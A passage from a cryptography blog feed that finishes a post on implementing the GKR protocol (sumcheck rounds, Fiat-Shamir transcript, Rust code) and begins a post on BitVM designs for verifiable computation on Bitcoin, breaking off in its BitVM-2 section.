&lt;p&gt;The prover computes the initial sum for both terms and adds them:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;let claimed_sum_term_1 = prover_term_1.compute_initial_sum()?;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;let claimed_sum_term_2 = prover_term_2.compute_initial_sum()?;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;let claimed_sum = claimed_sum_term_1 + claimed_sum_term_2;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;&lt;strong&gt;3. Apply the sumcheck protocol round by round&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;For each round, the prover computes the univariate polynomial for each term, sums them, and appends the result to the transcript. Each resulting polynomial $g_j$ is collected in a vector:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;let mut proof_polys = Vec::with_capacity(num_vars);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;for j in 0..num_vars {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let g_j_term_1 = prover_term_1.round(current_challenge.as_ref())?;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let g_j_term_2 = prover_term_2.round(current_challenge.as_ref())?;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let g_j = g_j_term_1 + g_j_term_2;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &#x2F;&#x2F; ...append g_j to transcript...&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    proof_polys.push(g_j);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    &#x2F;&#x2F; ...sample challenge, update current_challenge...&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;}&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;&lt;strong&gt;4. Collect the proof data&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;After all rounds, the vector of polynomials and the challenges are used to construct the sumcheck proof object:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;let sumcheck_proof = GKRSumcheckProof {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    round_polynomials: proof_polys,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    challenges,&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;};&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;&lt;strong&gt;5. Send to verifier&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;Include the sumcheck proof as part of the overall GKR proof, which the verifier will check in the next phase.&lt;&#x2F;p&gt;
&lt;h4 id=&quot;verifier-step-by-step-sumcheck-verification&quot;&gt;Verifier: Step-by-step sumcheck verification:&lt;&#x2F;h4&gt;
&lt;p&gt;At each layer, the verifier processes the sumcheck proof as follows:&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;1. For each round, check the degree and sum property&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;For each univariate polynomial $g_j$ received, check that the degree is at most two and that the sum of its evaluations at 0 and 1 matches the expected value (either the initial claim or the previous polynomial evaluated at the previous challenge):&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;&#x2F;&#x2F; Check that the degree of g_j does not exceed the theoretical bound&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;if g_j.degree() &amp;gt; 2 {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    return Err(crate::verifier::VerifierError::InvalidDegree);&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;}&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;let g_j_0 = g_j.evaluate::&amp;lt;F&amp;gt;(&amp;amp;FieldElement::zero());&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;let g_j_1 = g_j.evaluate::&amp;lt;F&amp;gt;(&amp;amp;FieldElement::one());&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;let sum_evals = &amp;amp;g_j_0 + &amp;amp;g_j_1;&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;let expected_sum = if j == 0 {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    claimed_sum.clone()&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;} else {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let prev_poly = &amp;amp;proof_polys[j - 1];&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    let prev_challenge = &amp;amp;challenges[j - 1];&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    prev_poly.evaluate::&amp;lt;F&amp;gt;(prev_challenge)&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;};&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;if sum_evals != expected_sum {&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;    return Ok((false, challenges));&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;}&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;&lt;strong&gt;2. Update the transcript and sample the next challenge&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;After each round, the verifier appends the polynomial to the transcript and samples the next challenge:&lt;&#x2F;p&gt;
&lt;pre class=&quot;giallo&quot; style=&quot;color: #E1E4E8; background-color: #24292E;&quot;&gt;&lt;code data-lang=&quot;plain&quot;&gt;&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;let r_j = transcript.sample_field_element();&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;
&lt;span class=&quot;giallo-l&quot;&gt;&lt;span&gt;challenges.push(r_j.clone());&lt;&#x2F;span&gt;&lt;&#x2F;span&gt;&lt;&#x2F;code&gt;&lt;&#x2F;pre&gt;
&lt;p&gt;&lt;strong&gt;3. Accept or reject&lt;&#x2F;strong&gt;&lt;&#x2F;p&gt;
&lt;p&gt;If all rounds pass the checks, accept the sum as correct, without needing to evaluate the full sum directly. If any check fails, reject the proof immediately.&lt;&#x2F;p&gt;
&lt;p&gt;Each round of the sumcheck protocol reduces the number of variables by one, transforming a multivariate sum into a sequence of univariate checks. The prover performs the main computations, while the verifier only needs to check a small number of polynomial evaluations and field operations. The use of the Fiat-Shamir transform ensures that the protocol is non-interactive, with all challenges derived from the transcript.&lt;&#x2F;p&gt;
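&lt;p&gt;The folding step above can be sketched with a toy multilinear polynomial given by its evaluations over the Boolean hypercube, with arithmetic in a small prime field ($p = 101$). This is an illustrative stand-in, not the lambdaworks implementation: names like &lt;code&gt;round_poly&lt;&#x2F;code&gt; and &lt;code&gt;fold&lt;&#x2F;code&gt; are hypothetical, and in the multilinear case each round polynomial has degree at most 1 rather than 2.&lt;&#x2F;p&gt;

```rust
// Toy sumcheck round over the prime field with p = 101 (illustration only).
const P: u64 = 101;

fn add(a: u64, b: u64) -> u64 { (a + b) % P }
fn sub(a: u64, b: u64) -> u64 { (P + a - b) % P }
fn mul(a: u64, b: u64) -> u64 { (a * b) % P }

/// Prover: compute g_j(0) and g_j(1), where g_j(X) sums f with the first free
/// variable fixed to X. `evals` holds f over {0,1}^n, first variable = high bit.
fn round_poly(evals: &[u64]) -> (u64, u64) {
    let half = evals.len() / 2;
    let g0 = evals[..half].iter().fold(0, |acc, &x| add(acc, x));
    let g1 = evals[half..].iter().fold(0, |acc, &x| add(acc, x));
    (g0, g1)
}

/// Evaluate the degree-1 round polynomial at the challenge r.
fn eval_linear(g0: u64, g1: u64, r: u64) -> u64 {
    add(mul(sub(1, r), g0), mul(r, g1))
}

/// Fold the evaluation table by fixing the first variable to r; the claimed
/// sum for the next round becomes eval_linear(g0, g1, r).
fn fold(evals: &[u64], r: u64) -> Vec<u64> {
    let half = evals.len() / 2;
    (0..half)
        .map(|i| add(mul(sub(1, r), evals[i]), mul(r, evals[half + i])))
        .collect()
}
```

&lt;p&gt;After checking $g_j(0) + g_j(1)$ against the current claim, the verifier takes $g_j(r)$ as the new claim, which equals the sum of the folded table.&lt;&#x2F;p&gt;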
&lt;h2 id=&quot;fiat-shamir-transform-making-it-non-interactive&quot;&gt;Fiat-Shamir Transform: Making it Non-Interactive&lt;&#x2F;h2&gt;
&lt;p&gt;The original GKR protocol is interactive, meaning it requires a series of back-and-forth communications between the prover and the verifier. While interactive proofs are theoretically sound, they can be impractical for many real-world applications due to latency and communication overhead. The Fiat-Shamir transform is a cryptographic technique used to convert interactive proof systems into non-interactive ones.&lt;&#x2F;p&gt;
&lt;h3 id=&quot;how-fiat-shamir-is-applied&quot;&gt;How Fiat-Shamir is Applied&lt;&#x2F;h3&gt;
&lt;p&gt;In our implementation, the Fiat-Shamir transform replaces the verifier’s random challenges with outputs from a cryptographic hash function, specifically a &lt;code&gt;DefaultTranscript&lt;&#x2F;code&gt; from the &lt;code&gt;lambdaworks_crypto&lt;&#x2F;code&gt; crate. This allows the prover to generate all necessary challenges deterministically, without any interaction with the verifier.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;1. Transcript Initialization&lt;&#x2F;strong&gt;: A transcript is created and seeded with public information relevant to the proof. This includes:&lt;&#x2F;p&gt;
&lt;ul&gt;
&lt;li&gt;The circuit structure (serialized via &lt;code&gt;circuit_to_bytes(circuit)&lt;&#x2F;code&gt;).&lt;&#x2F;li&gt;
&lt;li&gt;The public input values.&lt;&#x2F;li&gt;
&lt;li&gt;The claimed output values.&lt;&#x2F;li&gt;
&lt;&#x2F;ul&gt;
&lt;p&gt;By including this information, any party can reconstruct the same transcript and verify the challenges generated.&lt;&#x2F;p&gt;
&lt;p&gt;&lt;strong&gt;2. Challenge Generation&lt;&#x2F;strong&gt;: At each step where the interactive protocol would require a random challenge from the verifier, the implementation instead:&lt;&#x2F;p&gt;
&lt;ul&gt;
&lt;li&gt;Appends the current state of the proof (e.g., the coefficients of a polynomial sent by the prover) to the transcript.&lt;&#x2F;li&gt;
&lt;li&gt;Samples a random field element from the transcript using &lt;code&gt;transcript.sample_field_element()&lt;&#x2F;code&gt;. This element is cryptographically derived from all previous information in the transcript, making it unpredictable to the prover before the relevant information is committed.&lt;&#x2F;li&gt;
&lt;&#x2F;ul&gt;
&lt;h3 id=&quot;key-challenge-points&quot;&gt;Key Challenge Points&lt;&#x2F;h3&gt;
&lt;p&gt;The Fiat-Shamir transform is applied at several critical junctures in the GKR protocol:&lt;&#x2F;p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;strong&gt;Initial Random Values&lt;&#x2F;strong&gt; ($r_0$): For the output layer, initial random challenges are sampled to begin the layer-by-layer reduction.&lt;&#x2F;li&gt;
&lt;li&gt;&lt;strong&gt;Sumcheck Challenges&lt;&#x2F;strong&gt; ($s_j$): In each round of the Sumcheck protocol, challenges are generated from the transcript. These challenges are essential for the verifier to check the consistency of the prover's univariate polynomials.&lt;&#x2F;li&gt;
&lt;li&gt;&lt;strong&gt;Line Function Parameter&lt;&#x2F;strong&gt; ($r^\star$ or &lt;code&gt;r_new&lt;&#x2F;code&gt;): After each layer's sumcheck, a new challenge &lt;code&gt;r_new&lt;&#x2F;code&gt; is sampled. This challenge is used in the &lt;code&gt;line&lt;&#x2F;code&gt; function to derive the evaluation point for the next layer's claimed sum, effectively linking the layers in the proof.&lt;&#x2F;li&gt;
&lt;&#x2F;ul&gt;
&lt;p&gt;By leveraging the Fiat-Shamir transform, our GKR implementation achieves non-interactivity, making it more practical for real-world applications where continuous communication between prover and verifier might be infeasible or introduce undesirable latency. This transformation is a cornerstone of many modern zero-knowledge proof systems, enabling efficient and verifiable computation in a wide range of scenarios.&lt;&#x2F;p&gt;
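&lt;p&gt;The transcript mechanics described above can be sketched in a few lines. This is a minimal, non-cryptographic illustration: &lt;code&gt;DefaultHasher&lt;&#x2F;code&gt; from the Rust standard library stands in for the cryptographic hash inside &lt;code&gt;DefaultTranscript&lt;&#x2F;code&gt;, and the struct and method names are hypothetical sketches, not the lambdaworks API.&lt;&#x2F;p&gt;

```rust
use std::collections::hash_map::DefaultHasher;
use std::hash::{Hash, Hasher};

// A 64-bit prime (the Goldilocks prime), used here only for illustration.
const P: u64 = 0xffff_ffff_0000_0001;

// Toy Fiat-Shamir transcript: NOT collision resistant, illustration only.
struct Transcript {
    state: u64,
}

impl Transcript {
    /// Seed with public data (circuit bytes, public inputs, claimed outputs).
    fn new(seed: &[u8]) -> Self {
        let mut t = Transcript { state: 0 };
        t.append(seed);
        t
    }

    /// Absorb a prover message (e.g. round polynomial coefficients).
    fn append(&mut self, data: &[u8]) {
        let mut h = DefaultHasher::new();
        self.state.hash(&mut h);
        data.hash(&mut h);
        self.state = h.finish();
    }

    /// Derive a challenge deterministically from everything absorbed so far.
    fn sample_field_element(&mut self) -> u64 {
        self.append(b"challenge");
        self.state % P
    }
}
```

&lt;p&gt;Because the challenge depends on the whole transcript, prover and verifier derive identical challenges from identical messages, and any tampering with an absorbed message changes every subsequent challenge.&lt;&#x2F;p&gt;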
&lt;h2 id=&quot;summary&quot;&gt;Summary&lt;&#x2F;h2&gt;
&lt;p&gt;In this post, we showed how we implemented the GKR protocol. Starting from a circuit description, the prover evaluates each layer, constructs the corresponding polynomial, and runs a tailored Sumcheck protocol whose challenges are generated through a Fiat–Shamir transcript. The verifier, working with the same transcript, replays the Sumcheck rounds, checks the final claim with the composition polynomial $q$, and ultimately confirms that the computation is correct all the way down to the public inputs. In this way, a potentially expensive re-execution of the circuit is reduced to a series of lightweight algebraic checks.&lt;br &#x2F;&gt;
Although this implementation is intended for educational use, it captures every essential step of the protocol.&lt;&#x2F;p&gt;
</description>
      </item>
      <item>
          <title>BitVM: enabling efficient verifiable computation in Bitcoin</title>
          <pubDate>Thu, 26 Jun 2025 00:00:00 +0000</pubDate>
          <author>Unknown</author>
          <link>https://lambdaclass.github.io/lambdaclass_blog/posts/bitvm-enabling-efficient-verifiable-computation-in-bitcoin/</link>
          <guid>https://lambdaclass.github.io/lambdaclass_blog/posts/bitvm-enabling-efficient-verifiable-computation-in-bitcoin/</guid>
          <description xml:base="https://lambdaclass.github.io/lambdaclass_blog/posts/bitvm-enabling-efficient-verifiable-computation-in-bitcoin/">&lt;h2 id=&quot;introduction&quot;&gt;Introduction&lt;&#x2F;h2&gt;
&lt;p&gt;Bitcoin was the first blockchain in history, enabling a peer-to-peer electronic cash system for the first time. Introduced in &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;bitcoin.org&#x2F;bitcoin.pdf&quot;&gt;2008 by Satoshi Nakamoto&lt;&#x2F;a&gt;, it provided an elegant yet simple construction to enable people from across the world to store and exchange value over a permissionless and censorship-resistant network.&lt;&#x2F;p&gt;
&lt;p&gt;An important drawback of all blockchains is that they suffer from scalability issues, which stem from the blockchain trilemma between security, decentralization, and scalability. The fact that all nodes have to do the same amount of work to secure the network limits the throughput, since the less powerful ones act as bottlenecks. Zero-knowledge proofs allow a party, the prover, to convince another, the verifier, that a given statement is true without revealing anything other than the validity of the statement. These proofs are much faster to verify than naïve re-execution.&lt;&#x2F;p&gt;
&lt;p&gt;The smart contract capabilities in Bitcoin are limited to basic primitives, such as signatures, timelocks, and hashlocks. Besides, Bitcoin’s block size and stack (limited to 1000 elements) are important constraints when it comes to running programs. Bitcoin was not designed to carry out stateful computation, that is, computation that can persist through multiple transactions and user interactions. There are a couple of ways of achieving stateful computation, with varying security assumptions:&lt;&#x2F;p&gt;
&lt;ol&gt;
&lt;li&gt;Multisigs: a predetermined set of $n$ parties oversees the computation. It assumes there are at least $t$-of-$n$ honest parties for both safety and liveness. While this is the most straightforward construction, it has undesirable security assumptions for a censorship-resistant and permissionless network.&lt;&#x2F;li&gt;
&lt;li&gt;Covenants: they allow the locking script to constrain the spending transaction. This allows for data and logical persistence in Bitcoin without additional assumptions. However, covenants are not available in Bitcoin and would require an upgrade.&lt;&#x2F;li&gt;
&lt;li&gt;ColliderScript: uses a prohibitive amount of computation to emulate covenants. On the upside, it does not require trusted parties and has essentially the same security guarantees as covenants.&lt;&#x2F;li&gt;
&lt;&#x2F;ol&gt;
&lt;p&gt;BitVM is a paradigm that allows for the execution of arbitrary programs on Bitcoin, achieving greater expressivity while keeping the security of Bitcoin’s consensus. There are other proposals, such as &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;eprint.iacr.org&#x2F;2025&#x2F;591.pdf&quot;&gt;ColliderVM&lt;&#x2F;a&gt;. In this post, we will discuss some designs for the BitVM and their tradeoffs. Having more general compute capabilities would allow us to build bridges, L2s, and general smart contracts on top of Bitcoin.&lt;&#x2F;p&gt;
&lt;p&gt;There have been several advances and criticisms of these approaches. For example, see:&lt;&#x2F;p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;x.com&#x2F;david_seroy&#x2F;status&#x2F;1930342753961161172&quot;&gt;advances and breakthroughs on BitVM&lt;&#x2F;a&gt;,&lt;&#x2F;li&gt;
&lt;li&gt;&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;x.com&#x2F;ercwl&#x2F;status&#x2F;1936774866432110678&quot;&gt;BitVM on X&lt;&#x2F;a&gt;,&lt;&#x2F;li&gt;
&lt;li&gt;&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;eprint.iacr.org&#x2F;2025&#x2F;964.pdf&quot;&gt;Transfer of Ownership by Fairgate Labs&lt;&#x2F;a&gt;,&lt;&#x2F;li&gt;
&lt;li&gt;&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;eprint.iacr.org&#x2F;2024&#x2F;640.pdf&quot;&gt;On proving pairings by Alpen Labs&lt;&#x2F;a&gt;,&lt;&#x2F;li&gt;
&lt;li&gt;&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;medium.com&#x2F;@twhittle&#x2F;bitvm-bridges-considered-unsafe-9e1ce75c8176&quot;&gt;Why BitVM bridges are unsafe&lt;&#x2F;a&gt;,&lt;&#x2F;li&gt;
&lt;li&gt;&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;x.com&#x2F;ercwl&#x2F;status&#x2F;1918938164929962268&quot;&gt;How adding a simple opcode could make zk a reality in Bitcoin&lt;&#x2F;a&gt;,&lt;&#x2F;li&gt;
&lt;li&gt;&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;x.com&#x2F;dntse&#x2F;status&#x2F;1937843989031555124&quot;&gt;Engineering challenges regarding circuit sizes&lt;&#x2F;a&gt;.&lt;&#x2F;li&gt;
&lt;&#x2F;ul&gt;&lt;h2 id=&quot;challenges&quot;&gt;Challenges&lt;&#x2F;h2&gt;
&lt;p&gt;Bitcoin script has limited expressivity, making the execution of arbitrary programs extremely expensive. For example, executing the verification of a Groth16 proof, which on a consumer laptop can be carried out in a few milliseconds, requires up to 3 GB of script, almost three orders of magnitude more than the 4 MB of blockspace available right now! Doing operations on-chain is expensive, both in terms of space and wasted resources, so being able to move as much of the computation off-chain as possible can result in greater efficiency. In Ethereum, using ZK proofs is more straightforward, since verification contracts are deployed once and we can call them whenever needed. Even if verification is quite expensive, we can always use recursive proof verification (such as Aligned’s proof aggregation mode) to combine several proofs into one and amortize the cost among the constituent proofs.&lt;&#x2F;p&gt;
&lt;p&gt;In Bitcoin, we will have to leverage optimistic computation: we assume the party submitting the proof is behaving honestly, and different parties are able to challenge him, forcing the disclosure of intermediate steps and allowing them to provide fraud proofs showing where the submitter cheated. That way, the prover does not have to present most of the steps unless he is challenged. This is actually an example of a &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;eprint.iacr.org&#x2F;2023&#x2F;1472.pdf&quot;&gt;naysayer proof&lt;&#x2F;a&gt;, which can help reduce the on-chain burden significantly.&lt;&#x2F;p&gt;
&lt;p&gt;A positive point of the construction is that we do not need to implement changes at the consensus level in Bitcoin.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;bitvm-1&quot;&gt;BitVM-1&lt;&#x2F;h2&gt;
&lt;p&gt;This was the &lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;bitvm.org&#x2F;bitvm.pdf&quot;&gt;first design&lt;&#x2F;a&gt; to enable verifiable computation on top of Bitcoin. The basic point is that the prover can claim that a given function, evaluated over certain inputs, produces a given result. If the claim is false, the verifier can trigger a dispute, provide a short fraud proof, and punish the prover.&lt;&#x2F;p&gt;
&lt;p&gt;In this case, the design involved only two parties, a prover and a verifier. The off-chain computational burden and communication needed for the protocol are significant, limiting the kind of programs that can be executed. Future designs improved on these aspects, allowing more parties to interact and further reducing the size of disputes and the off-chain communication and computation burden.&lt;&#x2F;p&gt;
&lt;p&gt;Prover and verifier compile the program into a binary circuit. Any arbitrary computer program can be represented as a circuit of 1s and 0s flowing through logic gates like AND, OR, and NAND. BitVM chooses NAND (NOT-AND) gates as they are universal – any computation can be built using enough NAND gates. The prover then commits to the binary circuit in a Taproot address having one leaf script for each binary gate in the circuit. A taproot tree or taptree makes a UTXO spendable by satisfying certain conditions; the spending conditions are tap-leaves of a Merkle tree. They then presign a sequence of transactions to enable the challenge-response dynamics. After this, they can make on-chain deposits to the address, which activates the contract, and they can start exchanging off-chain data to produce changes in the circuit. Should the prover make false claims, the verifier can take his deposit.&lt;&#x2F;p&gt;
&lt;p&gt;How does the prover commit to a circuit? Basically, for each &lt;code&gt;bit&lt;&#x2F;code&gt; he wants to commit to, he has two hashes, &lt;code&gt;hash0&lt;&#x2F;code&gt; and &lt;code&gt;hash1&lt;&#x2F;code&gt;. If he wants to set the &lt;code&gt;bit&lt;&#x2F;code&gt; to 0, he reveals the preimage of &lt;code&gt;hash0&lt;&#x2F;code&gt;, and if he wants to set &lt;code&gt;bit&lt;&#x2F;code&gt; to 1, he reveals the preimage of &lt;code&gt;hash1&lt;&#x2F;code&gt;. If at some point the prover ends up revealing both preimages, then the verifier can use them to punish the prover. The value of the bit is set in the stack by hashing the preimage and checking that it matches one of the hashes. Any gate can be committed to by supplying two commitments to the inputs and one commitment to the output. Needless to say, this results in a huge blowup in memory footprint, since every bit requires two hashes, and the program has to be represented by a Boolean circuit, which may not be the most efficient form to represent it. Using other operations, such as those involving &lt;code&gt;u32&lt;&#x2F;code&gt;, can result in a more compact representation.&lt;&#x2F;p&gt;
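&lt;p&gt;The commit-and-reveal mechanics can be sketched as follows. This is a toy model: a real BitVM instance enforces these checks inside Bitcoin script with cryptographic hashes, while here &lt;code&gt;DefaultHasher&lt;&#x2F;code&gt; is a non-cryptographic stand-in and all names are hypothetical.&lt;&#x2F;p&gt;

```rust
use std::collections::hash_map::DefaultHasher;
use std::hash::{Hash, Hasher};

// Toy stand-in for the script-level hash (e.g. OP_HASH160 in real Bitcoin).
fn toy_hash(preimage: &[u8]) -> u64 {
    let mut h = DefaultHasher::new();
    preimage.hash(&mut h);
    h.finish()
}

struct BitCommitment {
    hash0: u64, // revealing its preimage sets the bit to 0
    hash1: u64, // revealing its preimage sets the bit to 1
}

impl BitCommitment {
    fn new(pre0: &[u8], pre1: &[u8]) -> Self {
        BitCommitment { hash0: toy_hash(pre0), hash1: toy_hash(pre1) }
    }

    /// What the locking script does: hash the revealed preimage and compare
    /// it against the two committed hashes to recover the bit value.
    fn open(&self, preimage: &[u8]) -> Option<u8> {
        let d = toy_hash(preimage);
        if d == self.hash0 {
            Some(0)
        } else if d == self.hash1 {
            Some(1)
        } else {
            None
        }
    }

    /// If both preimages are ever revealed, the verifier can slash the prover.
    fn equivocated(&self, pre_a: &[u8], pre_b: &[u8]) -> bool {
        matches!(
            (self.open(pre_a), self.open(pre_b)),
            (Some(0), Some(1)) | (Some(1), Some(0))
        )
    }
}
```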
&lt;p&gt;Once everything is set, the prover and verifier can engage in a game of challenges and responses. If at some point any of them stops cooperating (there is a time limit), the other can claim the deposit. The leaves in the prover’s tree (representing the gates) can only be spent if he knows the preimage held by the verifier. If the prover tries to change at least one of the values used in the gate, he would be revealing the preimage of the undisclosed hash (either &lt;code&gt;hash0&lt;&#x2F;code&gt; or &lt;code&gt;hash1&lt;&#x2F;code&gt;) and the verifier would be in possession of both preimages and can punish the prover for misbehavior. Using binary search, the verifier can find the error efficiently in a few rounds of interaction. In order to reduce the on-chain footprint, prover and verifier can exchange the preimages off-chain. In case the prover doesn’t want to cooperate, the verifier can force him to disclose on-chain. A huge drawback is that disproving a computation involves nearly 70 transactions.&lt;&#x2F;p&gt;
&lt;h2 id=&quot;bitvm-2&quot;&gt;BitVM-2&lt;&#x2F;h2&gt;
&lt;p&gt;&lt;a rel=&quot;noopener external&quot; target=&quot;_blank&quot; href=&quot;https:&#x2F;&#x2F;bitvm.org&#x2F;bitvm_bridge.pdf&quot;&gt;BitVM-2&lt;&#x2F;a&gt; achieves several advantages in security and efficiency. For example, the bridge’s trust assumption improves from a t-of-n honest majority to existential honesty during setup (1-of-n). The new design enabled multiple verifiers (allowing permissionless challenging) and the development of a bridge on top of it, which is a core component for L2s.&lt;&#x2F;p&gt;
&lt;p&gt;To be able to execute arbitrary programs, we will leverage SNARKs to generate a proof for the correct execution of the program and verify the proof on Bitcoin. Since verifying the proof is still expensive, we can have the prover commit to the results and, should watchers suspect that he is cheating, they can challenge him. The dispute can be solved in just 3 on-chain transactions, which is significantly less than in BitVM-1. To be able to run the verification, we proceed as follows:&lt;&#x2F;p&gt;
&lt;ol&gt;
&lt;li&gt;The verification program (at least 1.2 GB for Groth16 after optimizations) is broken up into subprograms, each at most 4 MB. Each chunk can be run in a single Bitcoin block. The programs run sequentially, and each depends on the output of the previous program.&lt;&#x2F;li&gt;
&lt;li&gt;The prover&#x2F;operator commits to executing the program, presigning specially crafted messages and taproot trees to ensure that he can withdraw funds and still be challenged for misbehavior.&lt;&#x2F;li&gt;
&lt;li&gt;When he wants to withdraw funds, he must provide the output of the SNARK verifier on-chain and stake capital.&lt;&#x2F;li&gt;
&lt;li&gt;Anyone can check the result with their (local) execution of the SNARK verifier and the public input (which should be available). In other words, other parties can run the full verification off-chain and compare their results with the one published by the prover.&lt;&#x2F;li&gt;
&lt;li&gt;If there is a difference, anyone can challenge the prover, who is forced to reveal the whole computation on-chain.&lt;&#x2F;li&gt;
&lt;li&gt;Anyone can then find the wrong chunks, execute them on-chain, proving that the results for the subprogram don't match, and slash the prover.&lt;&#x2F;li&gt;
&lt;&#x2F;ol&gt;
